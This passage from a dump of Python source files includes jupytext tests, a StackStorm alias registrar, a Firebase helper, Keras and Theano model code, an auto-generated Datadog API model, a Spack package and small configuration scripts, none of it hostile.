assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"1 + 1\n\n# a\n# long\n# cell\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_single_triple_quote_works(no_jupytext_version_number, text='''# ---\n# jupyter:\n# jupytext:\n# cell_markers: '\"\"\"'\n# formats: ipynb,py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# ---\n\n# %%\nprint(\"hello\")\n''', notebook=new_notebook(cells=[new_code_cell('print(\"hello\")')])):\n compare_notebooks(jupytext.reads(text, 'py'), notebook)\n\n\ndef test_docstring_with_quadruple_quote(nb=new_notebook(cells=[\n new_code_cell('''def fun_1(df):\n \"\"\"\"\n docstring starting with 4 double quotes and ending with 3\n \"\"\"\n return df'''),\n new_code_cell('''def fun_2(df):\n \"\"\"\n docstring\n \"\"\"\n return df''')\n])):\n \"\"\"Reproduces https://github.com/mwouts/jupytext/issues/460\"\"\"\n py = jupytext.writes(nb, 'py:percent')\n nb2 = jupytext.reads(py, 'py')\n compare_notebooks(nb2, nb)\n"} {"ext": "py", "sha": "1a2fa20ce8699c0d89d64e49ca36b015ea10ffd0", "content": "# Configuration file for the skipper script\n\nintro_duration=60 # Duration in seconds, change this value\n"} {"ext": "py", "sha": "1a2fa219503a17c62a8de6cd825611b4b91aa4eb", "content": "all_item_types = {\n 'cards': 'createCard',\n 'boards': 'createBoard', \n 'lists': 'createList',\n 'comments': 'commentCard',\n 'createChecklist': 'addChecklistToCard', \n 'updateCheck': 'updateCheckItemStateOnCard',\n 'moveCard': 'updateCard'\n}"} {"ext": "py", "sha": "1a2fa29986fe3882f57c423208672f82034bd1e3", "content": "if __name__ == \"__main__\":\n\n import os\n import sys\n\n sys.path.append(os.getcwd() + \"/../../\")\n\n import pandas as pd\n import itertools\n from kge_from_text import folder_definitions as fd\n import kge_from_text.models.term_embeddings as tt\n import kge_from_text.bridges.clean_bridge as bridge\n from kge_from_text.evaluators.evaluator_handler import EvaluatorHandler\n from kge_from_text.evaluators.analogy_evaluator import AnalogyEvaluator\n import kge_from_text.models.tee_embeddings as tee\n\n combinations = [(5, 400), (5, 500)]\n\n\n entity_vector_name = \"2016_data/entity_vectors\"\n type_vector_name = \"2016_data/type_vectors\"\n conactenated_name = \"2016_data/concatenated_vectors\"\n conactenated_name_time = \"2016_data/concatenated_vectors_time\"\n temporal_csv = \"2016_data/temporal_vectors.csv\"\n\n annotated_entity_file = \"2016_data/annotated_text_with_entities\"\n annotated_type_file = \"2016_data/annotated_text_with_types\"\n type_of_entity_file = \"2016_data/type_to_entity_data.ttl\"\n\n pure_text_model = \"2016_data/text_with_words\"\n\n # Declare An Evaluator\n evalu = EvaluatorHandler(fd.EVALUATION_RESULTS_ROOT, name=\"word_base\")\n\n for w_e, s_e in combinations:\n\n # ENTITY\n model_w = tt.TermEmbedding(\"text\")\n model_w.fit(input_text=fd.STARTING_DATA_ROOT + pure_text_model,\n output_file_path=fd.PRODUCED_MODELS_ROOT + \"2016_data/\", _size=s_e, _window=w_e, load_model_if_exits = True)\n\n\n analogies = pd.read_csv(fd.GOLD_STANDARDS + \"mikolov\", names=[\"First\", \"Second\", \"Third\", \"Fourth\"],\n sep=\" \")\n br = bridge.CleanBridge()\n\n analogy_eval = AnalogyEvaluator(br, model_w, analogies)\n\n evalu.run_evaluation(analogy_eval)\n\n analogies = pd.read_csv(fd.GOLD_STANDARDS + \"currency\", names=[\"First\", \"Second\", \"Third\", \"Fourth\"],\n sep=\" \")\n\n analogy_eval = AnalogyEvaluator(br, 
model_w, analogies)\n\n evalu.run_evaluation(analogy_eval)\n"} {"ext": "py", "sha": "1a2fa2c8737687b828f51c7e64396aca36a6f1fc", "content": "# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport six\n\nimport st2common.content.utils as content_utils\n\nfrom st2common import log as logging\nfrom st2common.constants.meta import ALLOWED_EXTS\nfrom st2common.bootstrap.base import ResourceRegistrar\nfrom st2common.models.api.action import ActionAliasAPI\nfrom st2common.persistence.actionalias import ActionAlias\n\n__all__ = [\n 'AliasesRegistrar',\n 'register_aliases'\n]\n\nLOG = logging.getLogger(__name__)\n\n\nclass AliasesRegistrar(ResourceRegistrar):\n ALLOWED_EXTENSIONS = ALLOWED_EXTS\n\n def register_aliases_from_packs(self, base_dirs):\n \"\"\"\n Discover all the packs in the provided directory and register aliases from all of the\n discovered packs.\n\n :return: Number of aliases registered.\n :rtype: ``int``\n \"\"\"\n registered_count = 0\n\n content = self._pack_loader.get_content(base_dirs=base_dirs,\n content_type='aliases')\n\n for pack, aliases_dir in six.iteritems(content):\n try:\n LOG.debug('Registering aliases from pack %s:, dir: %s', pack, aliases_dir)\n aliases = self._get_aliases_from_pack(aliases_dir)\n count = self._register_aliases_from_pack(pack=pack, aliases=aliases)\n registered_count += count\n except:\n LOG.exception('Failed registering all aliases from pack: %s', aliases_dir)\n\n return registered_count\n\n def register_aliases_from_pack(self, pack_dir):\n \"\"\"\n Register all the aliases from the provided pack.\n\n :return: Number of aliases registered.\n :rtype: ``int``\n \"\"\"\n pack_dir = pack_dir[:-1] if pack_dir.endswith('/') else pack_dir\n _, pack = os.path.split(pack_dir)\n aliases_dir = self._pack_loader.get_content_from_pack(pack_dir=pack_dir,\n content_type='aliases')\n\n registered_count = 0\n\n if not aliases_dir:\n return registered_count\n\n LOG.debug('Registering aliases from pack %s:, dir: %s', pack, aliases_dir)\n\n try:\n aliases = self._get_aliases_from_pack(aliases_dir=aliases_dir)\n registered_count = self._register_aliases_from_pack(pack=pack, aliases=aliases)\n except:\n LOG.exception('Failed registering all aliases from pack: %s', aliases_dir)\n return 0\n\n return registered_count\n\n def _get_aliases_from_pack(self, aliases_dir):\n return self.get_resources_from_pack(resources_dir=aliases_dir)\n\n def _register_action_alias(self, pack, action_alias):\n content = self._meta_loader.load(action_alias)\n pack_field = content.get('pack', None)\n if not pack_field:\n content['pack'] = pack\n pack_field = pack\n if pack_field != pack:\n raise Exception('Model is in pack \"%s\" but field \"pack\" is different: %s' %\n (pack, pack_field))\n\n action_alias_api = ActionAliasAPI(**content)\n 
action_alias_api.validate()\n action_alias_db = ActionAliasAPI.to_model(action_alias_api)\n\n try:\n action_alias_db.id = ActionAlias.get_by_name(action_alias_api.name).id\n except ValueError:\n LOG.info('ActionAlias %s not found. Creating new one.', action_alias)\n\n try:\n action_alias_db = ActionAlias.add_or_update(action_alias_db)\n extra = {'action_alias_db': action_alias_db}\n LOG.audit('Action alias updated. Action alias %s from %s.', action_alias_db,\n action_alias, extra=extra)\n except Exception:\n LOG.exception('Failed to create action alias %s.', action_alias_api.name)\n raise\n\n def _register_aliases_from_pack(self, pack, aliases):\n registered_count = 0\n\n for alias in aliases:\n try:\n LOG.debug('Loading alias from %s.', alias)\n self._register_action_alias(pack, alias)\n except Exception:\n LOG.exception('Unable to register alias: %s', alias)\n continue\n else:\n registered_count += 1\n\n return registered_count\n\n\ndef register_aliases(packs_base_paths=None, pack_dir=None):\n if packs_base_paths:\n assert(isinstance(packs_base_paths, list))\n\n if not packs_base_paths:\n packs_base_paths = content_utils.get_packs_base_paths()\n\n registrar = AliasesRegistrar()\n\n if pack_dir:\n result = registrar.register_aliases_from_pack(pack_dir=pack_dir)\n else:\n result = registrar.register_aliases_from_packs(base_dirs=packs_base_paths)\n\n return result\n"} {"ext": "py", "sha": "1a2fa31a8570b50309787abff5676b29d6214a61", "content": "import sys\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport firebase_admin\nfrom firebase_admin import credentials\nimport pandas as pd\nimport numpy as np\nimport random\n# import google_cloud_firestore\nfrom google.cloud import firestore as fs\ncred = credentials.Certificate(\"./keys/firebaseAdminAuth.json\")\n\n\ndef getRestaurants():\n db = firestore.client()\n\n rst_ref = db.collection(u'root/restaurants/rstList')\n\n docs = rst_ref.stream()\n\n rst_list = []\n\n for doc in docs:\n rst_list.append(doc.id)\n # print(f'{doc.id} => {doc.to_dict()}')\n\n return rst_list\n\n\ndef checkDocument(docPath):\n db = firestore.client()\n\n doc_ref = db.document(docPath)\n\n return doc_ref.get().exists\n"} {"ext": "py", "sha": "1a2fa3427bc865b29d503ed11ce2365f0c5d78c4", "content": "# Copyright (c) 2020 Graphcore Ltd. 
All rights reserved.\nimport tensorflow as tf\n\nfrom tensorflow.python import ipu\n\nfrom ipu_tensorflow_addons.keras.layers import Embedding, LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.datasets import imdb\nfrom tensorflow.keras.preprocessing import sequence\nfrom tensorflow.keras.optimizers import Adam\n\nif tf.__version__[0] != '2':\n raise ImportError(\"TensorFlow 2 is required for this example\")\n\n\nmax_features = 20000\nminibatch_size = 32\n\n\n# Define the dataset.\ndef get_dataset():\n (x_train, y_train), (_, _) = imdb.load_data(num_words=max_features)\n\n x_train = sequence.pad_sequences(x_train, maxlen=80)\n\n ds = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n ds = ds.repeat()\n ds = ds.map(lambda x, y: (x, tf.cast(y, tf.int32)))\n ds = ds.batch(minibatch_size, drop_remainder=True)\n return ds\n\n\n# Define the model.\ndef get_model():\n return tf.keras.Sequential(\n [Embedding(max_features, 128),\n LSTM(128, dropout=0.2),\n Dense(1, activation='sigmoid')])\n\n\ndef main():\n # Configure IPUs.\n cfg = ipu.config.IPUConfig()\n cfg.auto_select_ipus = 1\n cfg.configure_ipu_system()\n\n # Set up IPU strategy.\n strategy = ipu.ipu_strategy.IPUStrategy()\n with strategy.scope():\n\n model = get_model()\n\n model.compile(steps_per_execution=384, loss='binary_crossentropy', optimizer=Adam(0.005))\n model.fit(get_dataset(), steps_per_epoch=768, epochs=3)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2fa34abd33c56738177c4aa8448cf67fd8e4b0", "content": "# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2019-Present Datadog, Inc.\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom datadog_api_client.v2.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\n\ndef lazy_import():\n from datadog_api_client.v2.model.dashboard_list_item_request import DashboardListItemRequest\n\n globals()[\"DashboardListItemRequest\"] = DashboardListItemRequest\n\n\nclass DashboardListDeleteItemsRequest(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). 
The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n lazy_import()\n return {\n \"dashboards\": ([DashboardListItemRequest],), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n attribute_map = {\n \"dashboards\": \"dashboards\", # noqa: E501\n }\n\n _composed_schemas = {}\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_spec_property_naming\",\n \"_path_to_item\",\n \"_configuration\",\n \"_visited_composed_classes\",\n ]\n )\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"DashboardListDeleteItemsRequest - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n dashboards ([DashboardListItemRequest]): List of dashboards to delete from the dashboard list.. [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. 
Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n"} {"ext": "py", "sha": "1a2fa3ede57f67addf10c8752e0b455a74edc0de", "content": "from .claims import Claims\nfrom .cose import COSE\nfrom .cose_key import COSEKey\nfrom .cwt import (\n CWT,\n decode,\n encode,\n encode_and_encrypt,\n encode_and_mac,\n encode_and_sign,\n set_private_claim_names,\n)\nfrom .encrypted_cose_key import EncryptedCOSEKey\nfrom .exceptions import CWTError, DecodeError, EncodeError, VerifyError\nfrom .helpers.hcert import load_pem_hcert_dsc\nfrom .recipient import Recipient\nfrom .signer import Signer\n\n__version__ = \"1.3.2\"\n__title__ = \"cwt\"\n__description__ = \"A Python implementation of CWT/COSE\"\n__url__ = \"https://python-cwt.readthedocs.io\"\n__uri__ = __url__\n__doc__ = __description__ + \" <\" + __uri__ + \">\"\n__author__ = \"AJITOMI Daisuke\"\n__email__ = \"ajitomi@gmail.com\"\n__license__ = \"MIT\"\n__copyright__ = \"Copyright 2021 AJITOMI Daisuke\"\n__all__ = [\n \"encode\",\n \"encode_and_mac\",\n \"encode_and_sign\",\n \"encode_and_encrypt\",\n \"decode\",\n \"set_private_claim_names\",\n \"CWT\",\n \"COSE\",\n \"COSEKey\",\n \"EncryptedCOSEKey\",\n \"Claims\",\n \"Recipient\",\n \"Signer\",\n \"load_pem_hcert_dsc\",\n \"CWTError\",\n \"EncodeError\",\n \"DecodeError\",\n \"VerifyError\",\n]\n"} {"ext": "py", "sha": "1a2fa456371772b9300572a23d9fc92c7cc9be8a", "content": "# Copyright 2013-2018 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass Pacvim(MakefilePackage):\n \"\"\"Pacvim is a command-line-based game based off of Pacman.\n The main purpose of this software is to familiarize individuals\n with Vim.\"\"\"\n\n homepage = \"https://github.com/jmoon018/PacVim\"\n url = \"https://github.com/jmoon018/PacVim/archive/v1.1.1.tar.gz\"\n\n version('1.1.1', sha256='c869c5450fbafdfe8ba8a8a9bba3718775926f276f0552052dcfa090d21acb28')\n\n depends_on('ncurses')\n\n def edit(self, stage, prefix):\n makefile = FileFilter('Makefile')\n\n makefile.filter(r'PREFIX = /usr/local',\n 'PREFIX={0}'.format(self.prefix))\n"} {"ext": "py", "sha": "1a2fa50945f1a6c08082b410417c53dee9e84e86", "content": "#!/usr/bin/python3.6\n\nactivate_this = '/home/ubuntu/flaskapp/venv/bin/activate_this.py'\nwith open(activate_this) as f:\n exec(f.read(), dict(__file__=activate_this))\n\nimport sys\nimport logging\nlogging.basicConfig(stream=sys.stderr)\nsys.path.insert(0,\"/home/ubuntu/flaskapp/flaskapp/\")\n\nfrom manage import app as application\n\nif __name__ == \"__main__\":\n application.run()\n"} {"ext": "py", "sha": "1a2fa5e57cb4657488deed52fa03fa55c4854aa3", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport theano\nimport theano.tensor as T\nimport numpy as np\n\nfrom .. 
import activations, initializations\nfrom ..utils.theano_utils import shared_zeros, alloc_zeros_matrix\nfrom ..layers.core import Layer\nfrom .. import regularizers\n\nfrom six.moves import range\n\n\nclass BLSTM(Layer):\n def __init__(self, input_dim, output_dim,\n init='glorot_uniform', inner_init='orthogonal',\n activation='tanh', inner_activation='hard_sigmoid',\n weights=None, truncate_gradient=-1, return_sequences=False,\n is_entity=False, regularize=False):\n\n self.is_entity = is_entity\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.truncate_gradient = truncate_gradient\n self.return_sequences = return_sequences\n\n self.init = initializations.get(init)\n self.inner_init = initializations.get(inner_init)\n self.activation = activations.get(activation)\n self.inner_activation = activations.get(inner_activation)\n self.input = T.tensor3()\n\n self.W_if = self.init((self.input_dim, self.output_dim))\n self.W_ib = self.init((self.input_dim, self.output_dim))\n self.U_if = self.inner_init((self.output_dim, self.output_dim))\n self.U_ib = self.inner_init((self.output_dim, self.output_dim))\n self.b_if = shared_zeros((self.output_dim))\n self.b_ib = shared_zeros((self.output_dim))\n\n self.W_ff = self.init((self.input_dim, self.output_dim))\n self.W_fb = self.init((self.input_dim, self.output_dim))\n self.U_ff = self.inner_init((self.output_dim, self.output_dim))\n self.U_fb = self.inner_init((self.output_dim, self.output_dim))\n self.b_ff = shared_zeros((self.output_dim))\n self.b_fb = shared_zeros((self.output_dim))\n\n self.W_cf = self.init((self.input_dim, self.output_dim))\n self.W_cb = self.init((self.input_dim, self.output_dim))\n self.U_cf = self.inner_init((self.output_dim, self.output_dim))\n self.U_cb = self.inner_init((self.output_dim, self.output_dim))\n self.b_cf = shared_zeros((self.output_dim))\n self.b_cb = shared_zeros((self.output_dim))\n\n self.W_of = self.init((self.input_dim, self.output_dim))\n self.W_ob = self.init((self.input_dim, self.output_dim))\n self.U_of = self.inner_init((self.output_dim, self.output_dim))\n self.U_ob = self.inner_init((self.output_dim, self.output_dim))\n self.b_of = shared_zeros((self.output_dim))\n self.b_ob = shared_zeros((self.output_dim))\n\n self.W_yf = self.init((self.output_dim, self.output_dim))\n self.W_yb = self.init((self.output_dim, self.output_dim))\n #self.W_y = self.init((self.output_dim, self.output_dim))\n self.b_y = shared_zeros((self.output_dim))\n\n self.params = [\n self.W_if, self.U_if, self.b_if,\n self.W_ib, self.U_ib, self.b_ib,\n\n self.W_cf, self.U_cf, self.b_cf,\n self.W_cb, self.U_cb, self.b_cb,\n\n self.W_ff, self.U_ff, self.b_ff,\n self.W_fb, self.U_fb, self.b_fb,\n\n self.W_of, self.U_of, self.b_of,\n self.W_ob, self.U_ob, self.b_ob,\n\n self.W_yf, self.W_yb, self.b_y\n #self.W_y, self.b_y\n ]\n if regularize:\n self.regularizers = []\n for i in self.params:\n self.regularizers.append(regularizers.my_l2)\n\n if weights is not None:\n self.set_weights(weights)\n\n def _step(self,\n xi_t, xf_t, xo_t, xc_t,\n h_tm1, c_tm1,\n u_i, u_f, u_o, u_c):\n i_t = self.inner_activation(xi_t + T.dot(h_tm1, u_i))\n f_t = self.inner_activation(xf_t + T.dot(h_tm1, u_f))\n c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))\n o_t = self.inner_activation(xo_t + T.dot(h_tm1, u_o))\n h_t = o_t * self.activation(c_t)\n return h_t, c_t\n\n def output(self, train):\n X = self.get_input(train)\n X = X.dimshuffle((1,0,2))\n\n\n if self.is_entity:\n Entity = X[-1:].dimshuffle(1,0,2)\n X = X[:-1]\n\n 
b_y = self.b_y\n b_yn = T.repeat(T.repeat(b_y.reshape((1,self.output_dim)),X.shape[0],axis=0).reshape((1,X.shape[0],self.output_dim)), X.shape[1], axis=0)\n\n xif = T.dot(X, self.W_if) + self.b_if\n xib = T.dot(X, self.W_ib) + self.b_ib\n\n xff = T.dot(X, self.W_ff) + self.b_ff\n xfb = T.dot(X, self.W_fb) + self.b_fb\n\n xcf = T.dot(X, self.W_cf) + self.b_cf\n xcb = T.dot(X, self.W_cb) + self.b_cb\n\n xof = T.dot(X, self.W_of) + self.b_of\n xob = T.dot(X, self.W_ob) + self.b_ob\n\n [outputs_f, memories_f], updates_f = theano.scan(\n self._step,\n sequences=[xif, xff, xof, xcf],\n outputs_info=[\n alloc_zeros_matrix(X.shape[1], self.output_dim),\n alloc_zeros_matrix(X.shape[1], self.output_dim)\n ],\n non_sequences=[self.U_if, self.U_ff, self.U_of, self.U_cf],\n truncate_gradient=self.truncate_gradient\n )\n [outputs_b, memories_b], updates_b = theano.scan(\n self._step,\n sequences=[xib, xfb, xob, xcb],\n outputs_info=[\n alloc_zeros_matrix(X.shape[1], self.output_dim),\n alloc_zeros_matrix(X.shape[1], self.output_dim)\n ],\n non_sequences=[self.U_ib, self.U_fb, self.U_ob, self.U_cb],\n truncate_gradient=self.truncate_gradient\n )\n if self.return_sequences:\n y = T.add(T.add(\n T.tensordot(outputs_f.dimshuffle((1,0,2)), self.W_yf, [[2],[0]]),\n T.tensordot(outputs_b[::-1].dimshuffle((1,0,2)), self.W_yb, [[2],[0]])),\n b_yn)\n # y = T.add(T.tensordot(\n # T.add(outputs_f.dimshuffle((1, 0, 2)),\n # outputs_b[::-1].dimshuffle((1,0,2))),\n # self.W_y,[[2],[0]]),b_yn)\n if self.is_entity:\n return T.concatenate([y, Entity], axis=1)\n else:\n return y\n return T.concatenate((outputs_f[-1], outputs_b[0]))\n\n def get_config(self):\n return {\"name\":self.__class__.__name__,\n \"input_dim\":self.input_dim,\n \"output_dim\":self.output_dim,\n \"init\":self.init.__name__,\n \"inner_init\":self.inner_init.__name__,\n \"activation\":self.activation.__name__,\n \"truncate_gradient\":self.truncate_gradient,\n \"return_sequences\":self.return_sequences}\n\n\nclass BRNN(Layer):\n '''\n Fully connected Bi-directional RNN where:\n Output at time=t is fed back to input for time=t+1 in a forward pass\n Output at time=t is fed back to input for time=t-1 in a backward pass\n '''\n def __init__(self, input_dim, output_dim,\n init='uniform', inner_init='orthogonal', activation='sigmoid', weights=None,\n truncate_gradient=-1, return_sequences=False, is_entity=False, regularize=False):\n #whyjay\n self.is_entity = is_entity\n\n self.init = initializations.get(init)\n self.inner_init = initializations.get(inner_init)\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.truncate_gradient = truncate_gradient\n self.activation = activations.get(activation)\n self.return_sequences = return_sequences\n self.input = T.tensor3()\n self.W_o = self.init((self.input_dim, self.output_dim))\n self.W_if = self.init((self.input_dim, self.output_dim)) # Input -> Forward\n self.W_ib = self.init((self.input_dim, self.output_dim)) # Input -> Backward\n self.W_ff = self.init((self.output_dim, self.output_dim)) # Forward tm1 -> Forward t\n self.W_bb = self.init((self.output_dim, self.output_dim)) # Backward t -> Backward tm1\n self.b_if = shared_zeros((self.output_dim))\n self.b_ib = shared_zeros((self.output_dim))\n self.b_f = shared_zeros((self.output_dim))\n self.b_b = shared_zeros((self.output_dim))\n self.b_o = shared_zeros((self.output_dim))\n self.params = [self.W_o,self.W_if,self.W_ib, self.W_ff, self.W_bb,self.b_if,self.b_ib, self.b_f, self.b_b, self.b_o]\n\n if regularize:\n self.regularizers = []\n for i in 
self.params:\n self.regularizers.append(regularizers.my_l2)\n\n if weights is not None:\n self.set_weights(weights)\n\n def _step(self, x_t, h_tm1, u,b):\n return self.activation(x_t + T.dot(h_tm1, u)+b)\n\n def output(self, train):\n X = self.get_input(train) # shape: (nb_samples, time (padded with zeros at the end), input_dim)\n # new shape: (time, nb_samples, input_dim) -> because theano.scan iterates over main dimension\n X = X.dimshuffle((1, 0, 2))\n\n if self.is_entity:\n lenX=X.shape[0]\n Entity=X[lenX-1:].dimshuffle(1,0,2)\n X=X[:lenX-1]\n\n xf = self.activation(T.dot(X, self.W_if) + self.b_if)\n xb = self.activation(T.dot(X, self.W_ib) + self.b_ib)\n b_o=self.b_o\n b_on= T.repeat(T.repeat(b_o.reshape((1,self.output_dim)),X.shape[0],axis=0).reshape((1,X.shape[0],self.output_dim)),X.shape[1],axis=0)\n\n # Iterate forward over the first dimension of the x array (=time).\n outputs_f, updates_f = theano.scan(\n self._step, # this will be called with arguments (sequences[i], outputs[i-1], non_sequences[i])\n sequences=xf, # tensors to iterate over, inputs to _step\n # initialization of the output. Input to _step with default tap=-1.\n outputs_info=alloc_zeros_matrix(X.shape[1], self.output_dim),\n non_sequences=[self.W_ff,self.b_f], # static inputs to _step\n truncate_gradient=self.truncate_gradient\n )\n # Iterate backward over the first dimension of the x array (=time).\n outputs_b, updates_b = theano.scan(\n self._step, # this will be called with arguments (sequences[i], outputs[i-1], non_sequences[i])\n sequences=xb, # tensors to iterate over, inputs to _step\n # initialization of the output. Input to _step with default tap=-1.\n outputs_info=alloc_zeros_matrix(X.shape[1], self.output_dim),\n non_sequences=[self.W_bb,self.b_b], # static inputs to _step\n truncate_gradient=self.truncate_gradient,\n go_backwards=True # Iterate backwards through time\n )\n #return outputs_f.dimshuffle((1, 0, 2))\n if self.return_sequences:\n if self.is_entity:\n return T.concatenate([T.add(T.tensordot(T.add(outputs_f.dimshuffle((1, 0, 2)), outputs_b[::-1].dimshuffle((1,0,2))),self.W_o,[[2],[0]]),b_on),Entity],axis=1)\n else:\n return T.add(T.tensordot(T.add(outputs_f.dimshuffle((1, 0, 2)), outputs_b[::-1].dimshuffle((1,0,2))),self.W_o,[[2],[0]]),b_on)\n\n return T.concatenate((outputs_f[-1], outputs_b[0]))\n\n def get_config(self):\n return {\"name\":self.__class__.__name__,\n \"input_dim\":self.input_dim,\n \"output_dim\":self.output_dim,\n \"init\":self.init.__name__,\n \"inner_init\":self.inner_init.__name__,\n \"activation\":self.activation.__name__,\n \"truncate_gradient\":self.truncate_gradient,\n \"return_sequences\":self.return_sequences}\n\n"} {"ext": "py", "sha": "1a2fa736ea02f74aecb934a198adf2cbb76fca03", "content": "import _plotly_utils.basevalidators\n\n\nclass SmoothingValidator(_plotly_utils.basevalidators.NumberValidator):\n def __init__(self, plotly_name=\"smoothing\", parent_name=\"carpet.aaxis\", **kwargs):\n super(SmoothingValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type=kwargs.pop(\"edit_type\", \"calc\"),\n max=kwargs.pop(\"max\", 1.3),\n min=kwargs.pop(\"min\", 0),\n **kwargs,\n )\n"} {"ext": "py", "sha": "1a2fa73a21c9d5f030cc677eaa4d27eaf9c8c2e2", "content": "import numpy as np\n\nfrom finitewave.core.model import CardiacModel\nfrom finitewave.cpuwave2D.model.aliev_panfilov_2d.aliev_panfilov_kernels_2d \\\n import AlievPanfilovKernels2D\n\n_npfloat = \"float64\"\n\n\nclass AlievPanfilov2D(CardiacModel):\n def __init__(self):\n 
CardiacModel.__init__(self)\n self.v = np.ndarray\n self.w = np.ndarray\n self.state_vars = [\"u\", \"v\"]\n self.npfloat = 'float64'\n\n def initialize(self):\n super().initialize()\n weights_shape = self.cardiac_tissue.weights.shape\n shape = self.cardiac_tissue.mesh.shape\n self.diffuse_kernel = AlievPanfilovKernels2D().get_diffuse_kernel(weights_shape)\n self.ionic_kernel = AlievPanfilovKernels2D().get_ionic_kernel()\n self.v = np.zeros(shape, dtype=self.npfloat)\n\n def run_ionic_kernel(self):\n self.ionic_kernel(self.u_new, self.u, self.v, self.cardiac_tissue.mesh,\n self.dt)\n"} {"ext": "py", "sha": "1a2fa9bc071c85c8c01ed2af30bf00fb42c6360b", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMain \n\nCreated on Tue Aug 17 14:16:44 2021\nVersion: 1.0\nUniversidad Santo Tomás Tunja\nSimulation\n@author: Juana Valentina Mendoza Santamaría\n@author: Alix Ivonne Chaparro Vasquez\npresented to: Martha Susana Contreras Ortiz\n\"\"\" \nfrom controllers.settings import config\nfrom controllers.mainController import mainController\n\nif __name__ == \"__main__\":\n simulator = config.PARAMETERS['simulator']\n mainController(simulator) # True (simulation) - False 